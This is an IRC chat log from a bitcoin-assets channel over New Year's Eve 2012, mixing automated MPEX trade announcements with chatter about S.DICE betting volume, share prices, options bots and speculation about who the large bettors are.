I tried to send you an empty message. Dec 31 05:04:56 [MPEX] [S.MPOE] 8100 @ 0.00064 = 5.184 BTC [+] Dec 31 05:11:36 ;;bc,24hprc Dec 31 05:11:38 13.42 Dec 31 05:11:59 [MPEX] [O.BTCUSD.P120T] 1 @ 0.15493302 BTC [-] Dec 31 05:12:35 [MPEX] [O.BTCUSD.P130T] 1 @ 0.19999999 BTC [+] Dec 31 05:12:56 [MPEX] [O.BTCUSD.C140T] 1 @ 0.19999999 BTC [+] Dec 31 05:13:27 [MPEX] [O.BTCUSD.C150T] 1 @ 0.17394246 BTC [-] Dec 31 05:13:42 [MPEX] [S.MPOE] 11996 @ 0.00064 = 7.6774 BTC [+] Dec 31 05:13:44 grrr Dec 31 05:14:08 Bugpowder: grrr? Dec 31 05:14:10 its not in table or list format so I can't figure out how to pull it properly into the google doc. any suggestions smiles? Dec 31 05:14:17 smikcles Dec 31 05:14:22 sigh Dec 31 05:14:39 google doc can't handle json? Dec 31 05:15:14 hmmm Dec 31 05:15:19 i will check Dec 31 05:15:32 it should Dec 31 05:18:01 [MPEX] [S.MPOE] 3983 @ 0.00064 = 2.5491 BTC [+] Dec 31 05:23:39 I gotta write a sciprt to do it then Dec 31 05:24:04 I will figure this out later... mush watch this game Dec 31 05:24:08 happy new years eve! https://soundcloud.com/djleo/deflationary-forces Dec 31 05:24:09 touchdown RGIII Dec 31 05:24:48 Thanks for the pointers Dec 31 05:27:35 haha nice leotreasure Dec 31 05:28:19 :) thanks mircea_popescu Dec 31 05:59:45 [MPEX] [S.DICE] 28 @ 0.0036999 = 0.1036 BTC [+] Dec 31 06:02:49 [MPEX] [O.BTCUSD.P120T] 1 @ 0.15474813 BTC [-] Dec 31 06:03:36 [MPEX] [O.BTCUSD.P130T] 1 @ 0.19999999 BTC [+] Dec 31 06:04:03 [MPEX] [O.BTCUSD.C140T] 1 @ 0.19999999 BTC [+] Dec 31 06:04:38 [MPEX] [O.BTCUSD.C150T] 1 @ 0.17373531 BTC [-] Dec 31 06:08:08 [MPEX] [S.MPOE] 2200 @ 0.00064 = 1.408 BTC [+] Dec 31 06:09:54 TONY ROMO comes thru in the clutch Dec 31 06:11:51 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.41598735 = 415.9874 BTC [-] Dec 31 06:11:53 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.49067089 = 490.6709 BTC [-] Dec 31 06:12:16 [MPEX] [O.BTCUSD.P120T] 1 @ 0.15433309 BTC [-] Dec 31 06:12:45 [MPEX] [O.BTCUSD.P130T] 1 @ 0.19999999 BTC [+] Dec 31 06:12:59 [MPEX] [O.BTCUSD.C140T] 1 @ 0.19999999 BTC [+] Dec 31 06:13:47 [MPEX] [O.BTCUSD.C150T] 1 @ 0.17399111 BTC [+] Dec 31 06:14:38 smickles is that your bot doing p120 at .15 ? Dec 31 06:15:51 hmm, yeah, apparently my volatility measure is up there Dec 31 06:16:13 I'm mostly workin out other kinks right now tho Dec 31 06:16:45 but 10.43 seems like a long way to go down to to break even on that Dec 31 06:16:46 i c Dec 31 06:17:02 [MPEX] [O.BTCUSD.P120T] 1 @ 0.15433309 BTC [-] Dec 31 06:17:06 [MPEX] [S.MPOE] 14318 @ 0.00064 = 9.1635 BTC [+] Dec 31 06:17:36 [MPEX] [O.BTCUSD.P130T] 1 @ 0.19999999 BTC [+] Dec 31 06:17:55 [MPEX] [O.BTCUSD.C140T] 1 @ 0.19999999 BTC [+] Dec 31 06:18:38 [MPEX] [O.BTCUSD.C150T] 1 @ 0.17399111 BTC [+] Dec 31 06:37:14 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.41598735 = 415.9874 BTC [-] Dec 31 06:37:24 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.49067089 = 490.6709 BTC [-] Dec 31 06:37:46 !ticker O.BTCUSD.P200T Dec 31 06:37:47 [MPEX:O.BTCUSD.P200T] 1day: 0.49067089 / 0.4912274 / 0.49178391 (4000 shares, 1,964.91 BTC), 30day: 0.47526087 / 0.56767292 / 0.62061168 (18000 shares, 10,218.11 BTC) Dec 31 06:38:45 4000 in the past 24hrs? Dec 31 06:40:07 seems that way Dec 31 06:40:24 anyway. im off for the day. take care all. **** BEGIN LOGGING AT Mon Dec 31 14:51:43 2012 Dec 31 14:52:34 over 80k bet on S.DICE this morning Dec 31 14:53:05 no ?! Dec 31 14:53:14 still going Dec 31 14:53:20 5000BTC swings Dec 31 14:53:29 are they under or over ? Dec 31 14:53:35 currently SDICE is up another 3000 Dec 31 14:53:44 but 20 minutes ago they were down 3000 Dec 31 14:53:57 so for the month, around 23,000 Dec 31 14:53:58 heh Dec 31 14:54:21 They may surpass 500,000 BTC volume this month Dec 31 14:54:37 Wait a sec.... is that more than MPEX??? Dec 31 14:54:41 i guess the problem with sdice is that anyone can make competition for them etc Dec 31 14:54:45 o ya. way. Dec 31 14:55:19 If this volume keeps up after Jan 1... Dec 31 14:55:30 yeah. Dec 31 14:55:36 We are looking at expected revenue of 10,000/mo Dec 31 14:55:49 or 100k a year over a 3-400k company. Dec 31 14:55:54 IN BTC. which also appreciates. Dec 31 14:56:29 Almost as profitable as MPOE Dec 31 14:56:56 well, very different things. mpoe was mostly profitable through share appreciation, dice mostly through dividends Dec 31 14:57:10 I don't mean the stock Dec 31 14:57:16 but yeah Dec 31 14:57:24 in other news http://static.infowars.com/2012/12/i/general/counterthink_large.jpg Dec 31 14:58:00 ;;ticker Dec 31 14:58:00 BTCUSD ticker | Best bid: 13.43996, Best ask: 13.44994, Bid-ask spread: 0.00998, Last trade: 13.43996, 24 hour volume: 15187.67923515, 24 hour low: 13.36000, 24 hour high: 13.59000, 24 hour vwap: 13.46604 Dec 31 14:59:23 tbh it's likely s.mpoe was overbought because the large blocks on sale for s.dice had a depressing effect. Dec 31 14:59:37 i am curious if it will resolve by massive buys into s.dice or by sales of s.mpoe Dec 31 14:59:53 +1,721 Dec 31 15:00:08 so 25k now ? Dec 31 15:00:21 no Dec 31 15:00:26 21700 Dec 31 15:00:35 o o Dec 31 15:00:49 i thought they were 23k before Dec 31 15:00:55 so -1300 is what you meant ? Dec 31 15:01:01 well Dec 31 15:01:07 I'm just posting a rolling update Dec 31 15:01:12 for this mornings action Dec 31 15:03:48 betting pace is around 10BTC / s Dec 31 15:04:21 oy vey. Dec 31 15:04:52 shit Dec 31 15:04:54 +300 Dec 31 15:05:01 I have to stop looking Dec 31 15:05:20 lol Dec 31 15:05:23 fascinating is it Dec 31 15:05:31 It's like 2000 BTC a minute swings Dec 31 15:05:47 Yes it's like I"M betting Dec 31 15:05:53 lol Dec 31 15:06:07 Also fascinating, who is doing this? Dec 31 15:06:12 srsly. Dec 31 15:06:15 chinese ppl ? Dec 31 15:06:17 i have no idea. Dec 31 15:06:23 can the addies be traced at all to anything ? Dec 31 15:06:28 I wish we could trace them Dec 31 15:06:31 single entity ? wide diversity ? something in between ? Dec 31 15:06:43 isn't something like taint analysis usable in principle to do it ? Dec 31 15:06:57 http://blockchain.info/address/1Di6ux3CQBNXCZLD76BsnYWDo6XnFGzQah Dec 31 15:07:02 you're the research scientist cum brain surgeon, do something Dec 31 15:07:13 http://blockchain.info/address/1B5h9sf6xNLYGa3NBk48hwYbxyNZ22PRJk Dec 31 15:07:14 [MPEX] [S.MPOE] 26234 @ 0.00064 = 16.7898 BTC [+] Dec 31 15:07:39 You know more about bitcoin and network analysis than me Dec 31 15:08:07 not a happy account graph :) http://blockchain.info/charts/balance?address=1B5h9sf6xNLYGa3NBk48hwYbxyNZ22PRJk Dec 31 15:08:47 so basically someone bought 200k worth of btc and bet it all ? Dec 31 15:08:47 http://blockchain.info/address/17sjYPaYJAvtwXM2q5ojzrCiYewnQMBi9y Dec 31 15:08:53 They are all going to be traced back to evorhees Dec 31 15:09:06 o ? Dec 31 15:09:06 just recycling the profits Dec 31 15:09:12 to boost the traffic Dec 31 15:09:21 this is my new theory Dec 31 15:09:27 heheh Dec 31 15:09:32 i tell you what, if you can prove that one you're the new bitcoin star. Dec 31 15:09:36 you can even be my forum pr. Dec 31 15:09:51 even tho you're not a girl. Dec 31 15:09:55 He says his coins are untraceable Dec 31 15:10:04 (the ones he spends) Dec 31 15:10:15 evoorhees ? possibly because most of it come from mpex lol Dec 31 15:13:10 -2000 Dec 31 15:13:40 i thought you weren;t looking. Dec 31 15:21:48 +617 Dec 31 15:21:54 You know.... Dec 31 15:22:33 This evoorhees recycling mpex share sales to goose volumes hypothesis is... disturbingly plausible. Dec 31 15:23:30 Its a small number of addresses that bet heavily for a day at irregular intervals Dec 31 15:25:43 [MPEX] [S.MPOE] 3700 @ 0.00064 = 2.368 BTC [+] Dec 31 15:28:13 The dates of IPO share sales don't consistently lead the volume spike days though Dec 31 15:28:13 which you might expect if someone stupid would try to pull this off Dec 31 15:31:53 ;;rate pizzaman1337 1 a valued customer Dec 31 15:31:55 Rating entry successful. Your rating of 1 for user pizzaman1337 has been recorded. Dec 31 15:32:04 the thing is, long or short interval, makes no difference in the blockchain Dec 31 15:32:33 but on the other hand, mpex volume isn't 500k. it's 100k. not all of that is s.dice either. he'd have 20k or something to pump price with Dec 31 15:32:38 what'd that do ? Dec 31 15:33:16 drop in the bucket. unless he'd spin it like 50 times each coin, in which case it should be bleedingly obvious. Dec 31 15:33:24 Sir Mircea Popescu of the Romanian gangsterhood. Dec 31 15:33:31 lmao what ? Dec 31 15:34:02 *shrug* I was just tryin to come up with a funny name. Dec 31 15:34:20 is ART listed on bitfunder? Dec 31 15:35:03 MEXICO CITY Dec 31 15:35:10 Is it the cartels? Dec 31 15:35:34 Bugpowder that is an entirely plausible hypothesis also Dec 31 15:35:40 http://blockchain.info/tx-index/40410720/0 Dec 31 15:36:38 still, it'd be trivial to lease a vps there and relay Dec 31 15:36:51 trivial if one thinks about it, obviously. Dec 31 15:36:51 yeah Dec 31 15:36:59 well Dec 31 15:37:07 Final Balance: 7,180.33674724 BTC Dec 31 15:37:09 heh Dec 31 15:37:13 clicking through blockchain.info is not the right way to do this Dec 31 15:37:29 well ya, thing is... crime usually gets caught not by whatever having been too difficult, but by it being trivial and nobody thinking of it. Dec 31 15:43:38 ok that's a new record Dec 31 15:43:43 someone look at mpex's deposit addy. Dec 31 15:52:36 heh Dec 31 15:52:45 that's just about enough to sell through the S.DICE IPO Dec 31 15:56:04 isn't it. Dec 31 15:56:15 im curious if that's what it's for. Dec 31 15:59:30 ;;calc 0.00370000*2959421 Dec 31 15:59:31 10949.8577 Dec 31 15:59:50 lol wipage. Dec 31 16:07:04 [MPEX] [S.DICE] 152067 @ 0.0036999 = 562.6327 BTC [+] Dec 31 16:07:05 [MPEX] [S.DICE] 460 @ 0.00369999 = 1.702 BTC [+] Dec 31 16:07:05 [MPEX] [S.DICE] 2550181 @ 0.0037 = 9435.6697 BTC [+] Dec 31 16:08:06 that settles that. Dec 31 16:08:55 HAHAHAHAH Dec 31 16:08:57 YES Dec 31 16:08:59 [MPEX] [S.MPOE] 7887 @ 0.00064 = 5.0477 BTC [+] Dec 31 16:11:15 i wonder where it'll settle. Dec 31 16:11:18 !ticker s.dice Dec 31 16:11:19 [MPEX:S.DICE] 1day: 0.00343244 / 0.00369289 / 0.0037 (4067561 shares, 15,021.09 BTC), 30day: 0.0014 / 0.00327158 / 0.0037 (12729838 shares, 41,646.72 BTC) Dec 31 16:11:58 preety insane. Dec 31 16:13:49 btc finance ftw. Dec 31 16:14:39 well i have asks at 70 95 and 128 Dec 31 16:14:50 maybe all 3 are hit lmao Dec 31 16:15:02 i would be ok on that Dec 31 16:16:16 [MPEX] [S.MPOE] 3400000 @ 0.00064 = 2176 BTC [+] Dec 31 16:16:31 ahaha ok, well. now i feel better :D Dec 31 16:16:34 s.mpoe all left out! Dec 31 16:17:42 Thats the exact right strategy to buy S.MPOE though Dec 31 16:17:52 finish off the tier Dec 31 16:18:18 Bugpowder: fight breaks out during fiscal cliff talks Dec 31 16:18:24 no compromise in sight Dec 31 16:18:29 :P Dec 31 16:18:35 looks like your day Dec 31 16:20:40 fight lol Dec 31 16:20:47 did anyone take of shoes to beat on table ? Dec 31 16:22:25 [MPEX] [S.DICE] 3268 @ 0.00361906 = 11.8271 BTC [-] Dec 31 16:22:29 wait. Dec 31 16:22:56 ;;calc (562+ 9435+2176) / (22-7( Dec 31 16:22:57 Error: unexpected EOF while parsing (, line 1) Dec 31 16:22:59 ;;calc (562+ 9435+2176) / (22-7) Dec 31 16:23:00 811.533333333 Dec 31 16:23:08 811 btc per minute. MOAR THAN SDICE! Dec 31 16:23:17 nope Dec 31 16:23:21 10BTC / s Dec 31 16:23:27 oh Dec 31 16:23:31 nm Dec 31 16:23:32 in yo face, bugpowda Dec 31 16:23:37 i'm bad at math Dec 31 16:23:50 arent you a scientist? Dec 31 16:24:01 he's a sexientist Dec 31 16:24:04 sounds almost the same Dec 31 16:27:18 I'm joking Dec 31 16:27:20 hha Dec 31 16:27:23 well Dec 31 16:27:34 that person that sold 1.5M @ .0018.. Dec 31 16:27:37 sucks to be him Dec 31 16:33:27 lol for srs Dec 31 16:33:56 just took a 2700BTC loss Dec 31 16:33:59 [MPEX] [S.DICE] 7196 @ 0.0037 = 26.6252 BTC [+] Dec 31 16:34:04 yeaaaah Dec 31 16:34:06 moar Dec 31 16:34:10 SELL THE FUCK THRU Dec 31 16:34:20 same sorta thing happened to mpoe early on tho iirc Dec 31 16:34:21 ppl panic. Dec 31 16:34:33 well Dec 31 16:34:34 yeah Dec 31 16:34:43 there is a lot of risk Dec 31 16:34:52 almost everything I panic sold has crashed Dec 31 16:34:57 F.GIGA.ETF Dec 31 16:35:00 OBSI Dec 31 16:35:13 MPCD.B Dec 31 16:35:15 MPCD.C Dec 31 16:36:07 S.MPOE was not a panic sell, just a profit taking trade that I didn't get back in on in time before uber rally Dec 31 16:37:24 well good then Dec 31 16:37:37 I have not panic sold S.DICE Dec 31 16:37:41 only panic BUY Dec 31 16:38:52 s dice Dec 31 16:39:04 depends on people playing tho Dec 31 16:39:16 you are stealing stupid people tax Dec 31 16:39:19 like the lotto Dec 31 16:39:56 the thing is, on fundamentals sdice is so much better than lottery Dec 31 16:39:59 that there's a lot of room for it Dec 31 16:40:18 elaborate please Dec 31 16:40:19 no lottery can be run this efficiently. not in the same degree of magnitude either Dec 31 16:40:26 1.9% edge Dec 31 16:40:28 no costs Dec 31 16:40:33 no political bullshit Dec 31 16:40:36 global reach Dec 31 16:41:00 linkable to other games via APIs Dec 31 16:41:08 what else? Dec 31 16:41:21 well its good enough Dec 31 16:41:26 but what value does this provide non gamblers? Dec 31 16:41:28 state lottery pays 60% in the best case Dec 31 16:41:37 no lottery in fiat could be run on 2% Dec 31 16:41:42 to non gamblers ? Dec 31 16:41:48 well... it provides revenue Dec 31 16:41:51 to shareholders Dec 31 16:41:51 that's nonsense, what value does ford provide to non drivers Dec 31 16:42:10 negative value Dec 31 16:42:16 air pollution Dec 31 16:42:21 greenhouse gases Dec 31 16:42:54 "In 2012, the Global Casinos and Online Gambling industry is expected to generate revenue of $126.6 billion" Dec 31 16:43:32 aha. Dec 31 16:43:35 revenue, that is. Dec 31 16:43:41 not turnover. Dec 31 16:43:42 hmm Dec 31 16:43:45 and dollars only. Dec 31 16:43:48 who knows about india Dec 31 16:44:07 mircea_popescu: do you ever spend your bitcoins? Dec 31 16:44:15 conswevatively s.dice could have 1% of the entire market Dec 31 16:44:23 that's possibly 1 trn a year. Dec 31 16:44:27 of which 20bn in profits on avg Dec 31 16:45:35 this is what good start-ups are Dec 31 16:45:37 not airbnb bs Dec 31 17:03:00 airbnb is awesome Dec 31 17:03:09 man what would i do without it Dec 31 17:03:10 eh get out Dec 31 17:03:25 den of scammers and thieves Dec 31 17:03:42 fucking "gypos online" Dec 31 17:03:54 hey, we want to travel but we can't afford 50 bux or w/e 8ball costs Dec 31 17:05:57 easiest way to case a place for robbery Dec 31 17:11:39 it's a no starter for both ends of the deal. pretty much spiral of doom both ways. Dec 31 17:14:10 [MPEX] [S.DICE] 2450 @ 0.00368818 = 9.036 BTC [-] Dec 31 17:16:21 i was being sarcastic Dec 31 17:16:38 paul graham is a washout oe Dec 31 17:16:40 now* Dec 31 17:37:04 [MPEX] [S.DICE] 2016 @ 0.00368818 = 7.4354 BTC [-] Dec 31 17:39:31 [MPEX] [S.MPOE] 15051 @ 0.00064 = 9.6326 BTC [+] Dec 31 17:39:32 [MPEX] [S.MPOE] 15200 @ 0.00064134 = 9.7484 BTC [+] Dec 31 17:58:29 sadly. Dec 31 17:58:46 it's how it works for most people, they do something early in their 30s and then enver live up to it. Dec 31 17:58:54 complacency. Dec 31 18:07:21 and heres the new years present http://www.youtube.com/watch?v=v_6jutCHATc Dec 31 18:15:43 Unknown Exception Dec 31 18:15:51 anyone else see this on blockchain.info ? Dec 31 18:17:37 [MPEX] [S.DICE] 634 @ 0.00368818 = 2.3383 BTC [-] Dec 31 18:17:39 [MPEX] [S.DICE] 266 @ 0.0037 = 0.9842 BTC [+] Dec 31 18:28:42 Could not create connection to database server. Attempted reconnect 3 times. Giving up. Dec 31 18:28:44 odd Dec 31 18:31:40 S.DICE bettor is dossing blockchain to prevent discovery Dec 31 18:40:47 [MPEX] [S.DICE] 181 @ 0.00361906 = 0.655 BTC [-] Dec 31 18:40:49 [MPEX] [S.DICE] 5519 @ 0.00360726 = 19.9085 BTC [-] Dec 31 18:46:54 money laundering? Dec 31 18:47:09 i should launder money for cartels Dec 31 18:50:40 [MPEX] [S.DICE] 1531 @ 0.00360726 = 5.5227 BTC [-] Dec 31 18:58:48 looks like the S.MPOE buy bot has switched to S.DICE :) Dec 31 18:59:33 stop calling me a bot. i'm dollar cost averaging. Dec 31 19:12:42 lol Dec 31 19:12:42 http://mineforeman.com/2012/12/31/butterfly-labs-deliver-on-photos-of-their-new-production-line/ Dec 31 19:12:56 looks like they are ready to roll off the presses Dec 31 19:17:16 haha i love the shill commentary on that one Dec 31 19:17:45 "they might not actually have asic chips in hand like the competition, but wouldn't you rather have big mystery machinery?" Dec 31 19:18:33 [MPEX] [S.DICE] 1019 @ 0.00349157 = 3.5579 BTC [-] Dec 31 19:19:31 surely they wouldn't buy pnp machines if they were scammers? where else can you get a photo? Dec 31 19:20:53 blah 12-12-31 16:50:49 lessthan 6000 f76015a6 8bad83bc 1MqrpPC CONFIRMED 100.00000000 WIN 1066.55176666 5767 Dec 31 19:26:54 man if every day had this level of betting action.... 15% avr monthly dividends.... Dec 31 19:35:56 pigeons: bankruptcy auction? Dec 31 19:36:36 naysayer! Dec 31 20:08:20 [MPEX] [S.DICE] 3381 @ 0.00356415 = 12.0504 BTC [+] Dec 31 20:10:27 < thestringpuller> mircea_popescu: do you ever spend your bitcoins? <<< question successfully evaded :D Dec 31 20:10:33 oh wait Dec 31 20:15:42 lol Dec 31 20:15:45 no, i don't really Dec 31 20:15:54 i do csr stuff and so forth, but other than that... Dec 31 20:16:23 you mean mpex expenses? Dec 31 20:16:36 that's not really 'you' though Dec 31 20:17:04 anyone want to sell me 2 MPExBTC? Dec 31 20:19:03 or fund an unproven, possibly buggy, options market maker bot, possibly losing all your btc, or possibly gaining a little btc? Dec 31 20:20:21 [MPEX] [S.MPOE] 9450 @ 0.00065652 = 6.2041 BTC [+] Dec 31 20:20:23 [MPEX] [S.MPOE] 15625 @ 0.00065999 = 10.3123 BTC [+] Dec 31 20:20:23 [MPEX] [S.MPOE] 47778 @ 0.00066 = 31.5335 BTC [+] Dec 31 20:21:30 in all likelyhood it's lose some vs gain some, but losing all sounds scarier, and I don't want to deal with pussies Dec 31 20:25:19 lol Dec 31 20:27:36 mf bollox ... now down one click of death seagate 1TB truecrypt disk. and of course it is too late to get the usb-terminal cable to find out whether i can reflash the drive bios. Dec 31 20:27:39 :-( Dec 31 20:29:39 one click of death? Dec 31 20:37:05 [MPEX] [O.BTCUSD.C120T] 1 @ 0.18457935 BTC [-] Dec 31 20:37:18 [MPEX] [O.BTCUSD.P120T] 1 @ 0.09886507 BTC [-] Dec 31 20:39:19 Namjies: http://blockchain.info/tx/17b449d5b43d06929ff1983d824c7ac883b2c30d66b6ca48adffc9ea15737d74 Dec 31 20:39:24 ;) Dec 31 20:44:30 arf Dec 31 20:45:02 I had 31 SS, right Dec 31 20:45:50 wait, someone had over 60k SS? Dec 31 20:47:11 Namjies: it was a mixed payment of peeps who got all 3 payments in one, and peeps who got their third payment Dec 31 20:51:22 ah Dec 31 20:51:29 seems like a mess to manage Dec 31 20:51:58 [MPEX] [S.MPOE] 65650 @ 0.00066 = 43.329 BTC [+] Dec 31 20:53:25 [MPEX] [S.DICE] 1469 @ 0.00354422 = 5.2065 BTC [-] Dec 31 20:53:26 [MPEX] [S.DICE] 2100 @ 0.00358157 = 7.5213 BTC [+] Dec 31 20:55:38 [18:29:47] one click of death? --< one "click-of-death" seagate drive Dec 31 20:56:06 apparently it has some firmware that when it fails tries to write to somewhere in the outer solar system... Dec 31 20:58:59 It's a firmware that "smartly target the most empty space" Dec 31 20:59:27 The microscopic disclaimer vaguely mention that the empty space might not even be on a disk. Dec 31 21:17:05 [MPEX] [S.DICE] 2000 @ 0.00361366 = 7.2273 BTC [+] Dec 31 21:19:22 [MPEX] [S.DICE] 900 @ 0.00361366 = 3.2523 BTC [+] Dec 31 21:21:48 [MPEX] [S.DICE] 2200 @ 0.0036969 = 8.1332 BTC [+] Dec 31 21:33:52 [MPEX] [S.DICE] 728 @ 0.0036969 = 2.6913 BTC [+] Dec 31 21:44:51 [MPEX] [S.DICE] 2550 @ 0.00359888 = 9.1771 BTC [-] Dec 31 22:08:32 [MPEX] [S.MPOE] 5504 @ 0.00066 = 3.6326 BTC [+] Dec 31 22:11:55 ;;bc,24hprc Dec 31 22:11:57 13.43 Dec 31 22:12:50 so, the only non automated message i got wishing me good luck in 2013 got into my email by mistake (not ment for me) Dec 31 22:13:03 even got some strangers pic along with it Dec 31 22:15:04 Well Diablo-D3, it seems like that person I was talking about actually is the claimed person. Dec 31 22:15:22 Highest investor profile I've seen yet. Dec 31 22:29:00 Namjies: what's the deal with BitVPS -- are you guys going to publish a statement? Dec 31 22:30:42 for MPEx? Dec 31 22:30:44 yes Dec 31 22:43:02 [MPEX] [S.DICE] 1055 @ 0.00359888 = 3.7968 BTC [-] Dec 31 22:43:04 [MPEX] [S.DICE] 3445 @ 0.00350619 = 12.0788 BTC [-] Dec 31 23:24:28 [MPEX] [S.DICE] 2400 @ 0.00350619 = 8.4149 BTC [-] Dec 31 23:30:20 kakobrekla: well, happy new year! Dec 31 23:31:18 o, thank you pizzaman1337! I wish a prosperous year for you too :) Dec 31 23:31:33 brb gotta throw some wood in the chimney Dec 31 23:33:40 chimney? Might I suggest that you aim lower, for the furnace ;) Dec 31 23:34:57 unless he's trying to kill Santa Dec 31 23:46:17 [MPEX] [S.DICE] 1400 @ 0.00362226 = 5.0712 BTC [+] Dec 31 23:49:09 yeah, chimney... i guess a bad translation of a metaphore Dec 31 23:49:15 its a fireplace in the living room Dec 31 23:49:37 i would need to go to the roof to fill it through the chimney Dec 31 23:49:45 [MPEX] [S.DICE] 1500 @ 0.00350619 = 5.2593 BTC [-] Dec 31 23:49:46 certanly doable Dec 31 23:58:47 [MPEX] [S.DICE] 1550 @ 0.00354441 = 5.4938 BTC [+] Jan 01 00:01:08 just had the first fireworks of the night. Jan 01 00:03:59 [MPEX] [S.DICE] 2200 @ 0.00359341 = 7.9055 BTC [+] Jan 01 01:05:23 regards from 2013 Jan 01 01:05:28 smells funny here Jan 01 01:06:41 [MPEX] [S.MPOE] 26200 @ 0.00066 = 17.292 BTC [+] Jan 01 01:06:55 Damn, still 2012 here Jan 01 01:07:29 smells like firecrackers Jan 01 01:10:06 [MPEX] [S.DICE] 1000 @ 0.00359967 = 3.5997 BTC [+] Jan 01 01:10:07 [MPEX] [S.DICE] 2450 @ 0.00361855 = 8.8654 BTC [+] Jan 01 01:10:34 astonishing... Jan 01 01:15:51 [MPEX] [S.DICE] 4012 @ 0.00361855 = 14.5176 BTC [+] Jan 01 01:24:06 [MPEX] [S.DICE] 2738 @ 0.00361855 = 9.9076 BTC [+] Jan 01 01:24:07 [MPEX] [S.DICE] 339 @ 0.00362226 = 1.2279 BTC [+] Jan 01 01:42:33 [MPEX] [S.DICE] 2050 @ 0.00362226 = 7.4256 BTC [+] Jan 01 01:49:23 -mquin- [Global Notice] As we are approaching midnight fST (UTC), we'd like again to wish you all a happy new year 2013 and invite you to join us in #freenode-newyears Jan 01 02:21:21 woot! first post Jan 01 02:21:51 and not even a bot in sight to have first trade Jan 01 02:22:45 [MPEX] [S.DICE] 700 @ 0.00359821 = 2.5187 BTC [-] Jan 01 02:27:11 ? Jan 01 02:29:57 Anyone here from Detroit? Jan 01 03:01:29 ;;seen smickles Jan 01 03:01:29 smickles was last seen in #bitcoin-assets 3 hours, 27 minutes, and 48 seconds ago: chimney? Might I suggest that you aim lower, for the furnace ;) Jan 01 03:07:20 [MPEX] [S.MPOE] 5800 @ 0.00065735 = 3.8126 BTC [-] Jan 01 03:12:17 [MPEX] [S.MPOE] 2450 @ 0.00065735 = 1.6105 BTC [-] Jan 01 03:41:16 [MPEX] [S.DICE] 200 @ 0.00359821 = 0.7196 BTC [-] Jan 01 03:41:17 [MPEX] [S.DICE] 1950 @ 0.00359341 = 7.0071 BTC [-] Jan 01 04:28:06 [MPEX] [S.MPOE] 8100 @ 0.00065735 = 5.3245 BTC [-] Jan 01 04:28:07 [MPEX] [S.MPOE] 20600 @ 0.00065251 = 13.4417 BTC [-] Jan 01 04:28:08 [MPEX] [S.MPOE] 13849 @ 0.0006515 = 9.0226 BTC [-] Jan 01 04:28:48 [MPEX] [S.MPOE] 4800 @ 0.00064494 = 3.0957 BTC [-] Jan 01 04:28:49 [MPEX] [S.MPOE] 200 @ 0.00063986 = 0.128 BTC [-] Jan 01 04:29:34 Well anyone interested in the new BTC-BOND? An amazingly rock bottom low 0.03% daily. Jan 01 04:33:12 speaking of funds, KV1 deposits are now closed for Jan Jan 01 04:36:37 KV1? Jan 01 04:41:58 yeah, bitcoin forex fund ran by our robots Jan 01 04:43:55 oh Jan 01 04:44:02 Damn, I wasn't aware of that. Jan 01 04:44:07 +15% in dec Jan 01 04:44:58 accually net was 20.6 after the fees Jan 01 04:45:07 but thats a hummm, exception. Jan 01 04:45:25 Where is it trading? Jan 01 04:45:52 http://shrani.si/f/2W/106/3D1a3z3d/fx.png Jan 01 04:47:10 kv1 is on the right Jan 01 04:47:16 at least that was dec setup **** BEGIN LOGGING AT Tue Jan 1 15:42:28 2013 Jan 01 15:56:20 `*-+ Jan 01 16:10:52 http://upload.wikimedia.org/wikipedia/commons/e/e6/Oy_vey!_brooklyn.png Jan 01 16:13:16 happy new year all Jan 01 16:13:38 happy new pigeons! Jan 01 16:36:12 [MPEX] [S.DICE] 5 @ 0.00361053 = 0.0181 BTC [+] Jan 01 16:36:13 [MPEX] [S.DICE] 1808 @ 0.00355621 = 6.4296 BTC [-] Jan 01 16:36:15 [MPEX] [S.DICE] 600 @ 0.00355547 = 2.1333 BTC [-] Jan 01 16:36:16 [MPEX] [S.DICE] 537 @ 0.00353379 = 1.8976 BTC [-] Jan 01 17:16:38 [MPEX] [S.MPOE] 4128 @ 0.00063369 = 2.6159 BTC [+] Jan 01 17:16:39 [MPEX] [S.MPOE] 2450 @ 0.00064462 = 1.5793 BTC [+] Jan 01 17:16:52 ;;later tell bugpowder http://trilema.com/2013/the-question-of-the-year-in-btc/ you're famous now. Jan 01 17:16:52 The operation succeeded. Jan 01 17:48:30 [MPEX] [S.MPOE] 4272 @ 0.00064841 = 2.77 BTC [+] Jan 01 18:37:02 [MPEX] [S.DICE] 1937 @ 0.00353379 = 6.845 BTC [-] Jan 01 18:48:15 [MPEX] [S.DICE] 2450 @ 0.00353379 = 8.6578 BTC [-] Jan 01 19:02:26 mircea_popescu: you'll have to give us a goo Romanian vampire story some day. Like one about babies being taken in the night by the upyr lady or somehting Jan 01 19:03:14 hello and happy new year Jan 01 19:04:22 [MPEX] [S.DICE] 476 @ 0.00353379 = 1.6821 BTC [-] Jan 01 19:04:23 [MPEX] [S.DICE] 1800 @ 0.00351291 = 6.3232 BTC [-] Jan 01 19:04:24 [MPEX] [S.DICE] 96 @ 0.00350619 = 0.3366 BTC [-] Jan 01 19:04:58 howdy jcpham, starting things off well, i hope :) Jan 01 19:07:18 entirely hung over Jan 01 19:07:18 still have about 75 gallons of beer to drink Jan 01 19:07:22 or dump in the lake Jan 01 19:08:15 mircea_popescu: http://trilema.com/2013/the-question-of-the-year-in-btc/ <<< you should offer a bounty for people who recruite the person who finds the answer, or make that "significant service" one explicitly include it. Jan 01 19:08:20 mircea_popescu: see http://en.wikipedia.org/wiki/DARPA_Network_Challenge#Winning_strategy Jan 01 19:18:27 jcpham: that could cause a lot of drunk fish Jan 01 19:18:39 ;;ticker Jan 01 19:18:39 BTCUSD ticker | Best bid: 13.24098, Best ask: 13.24100, Bid-ask spread: 0.00002, Last trade: 13.24098, 24 hour volume: 29401.07197803, 24 hour low: 13.17324, 24 hour high: 13.56100, 24 hour vwap: 13.38349 Jan 01 19:19:18 uh oh, looks like a price dip is happening Jan 01 19:37:10 [MPEX] [S.DICE] 550 @ 0.00354656 = 1.9506 BTC [+] Jan 01 19:39:11 is mr. smickles around Jan 01 19:39:12 well, the elliot wavers probably see a decent dip beginning from this Jan 01 19:39:26 I think so Jan 01 19:39:33 thestringpuller: ^ Jan 01 19:42:08 also, this might establish an sma30 crossing Jan 01 19:42:28 so peeps who like that technical will be selling too Jan 01 19:44:15 [MPEX] [S.DICE] 1800 @ 0.00354656 = 6.3838 BTC [+] Jan 01 19:44:16 [MPEX] [S.DICE] 400 @ 0.00361322 = 